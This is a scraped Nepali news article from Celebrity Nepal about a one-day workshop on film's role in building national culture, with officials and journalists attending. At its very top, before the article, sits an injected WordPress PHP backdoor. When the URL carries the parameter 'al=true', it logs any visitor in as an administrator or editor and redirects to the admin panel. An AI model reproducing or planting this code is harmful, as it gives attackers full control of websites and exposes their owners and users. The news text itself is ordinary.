// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); ‘रास्ट्रिय संस्कृती निर्माणमा चलचित्रको भुमिका’ सम्बन्धमा १ दिने कार्यशाला गोष्ठी सम्पन्न – Celebrity Nepal

‘रास्ट्रिय संस्कृती निर्माणमा चलचित्रको भुमिका’ सम्बन्धमा १ दिने कार्यशाला गोष्ठी सम्पन्न


सेलिब्रेटी नेपाल काठमाडौँ
जनपक्षिय कलाकर्मी संघको १० औं बार्षिक उत्सबको अबसरमा रास्ट्रिय संस्कृती निर्माणमा चलचित्रको भुमिका १ दिने कार्यशाला गोष्ठी सम्पन्न भएको छ । नेपाल चलचित्र बिकाश बोर्डको सह आयोजनामा सम्पन्न भएको गोस्थिमा एभरेस्ट वासिंगले सहयोगीको भुमिका निर्वाह गरेको हो । कार्यशालाको उद्घाटन समारोहमा नेकपा एमालेका बरिस्ट नेता एबम पुर्ब प्रधान मन्त्रि माधव कुमार नेपाल प्रमुख अतिथि रहेका थिय । संघका अध्यक्ष केशब भट्टराईको सभापतित्वमा कार्यशाला सम्पन्न भएको हो । कार्यशालामा नेकपा एमालेका सचिब तथा पोलिटब्युरो सदस्य प्रदिप ज्ञवालीले कार्यपत्र प्रस्तुत गरेका थिए । कार्यक्रममा चलचित्र बिकाश बोर्डका अध्यक्ष राज कुमार राइ,चलचित्र पत्रकार संघका अध्यक्ष शान्तीप्रिय,पत्रकार विजय रत्न तुलाधर,पत्रकार भरत शाक्य अतिथिको रुपमा रहेका थिए । कार्यशालामा ओस्कार कलेजमा फिल्म स्टडी गरिरहेका बिद्यार्थीहरुको सहभागिता रहेको थियो ।

janapaxiy gosthi

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.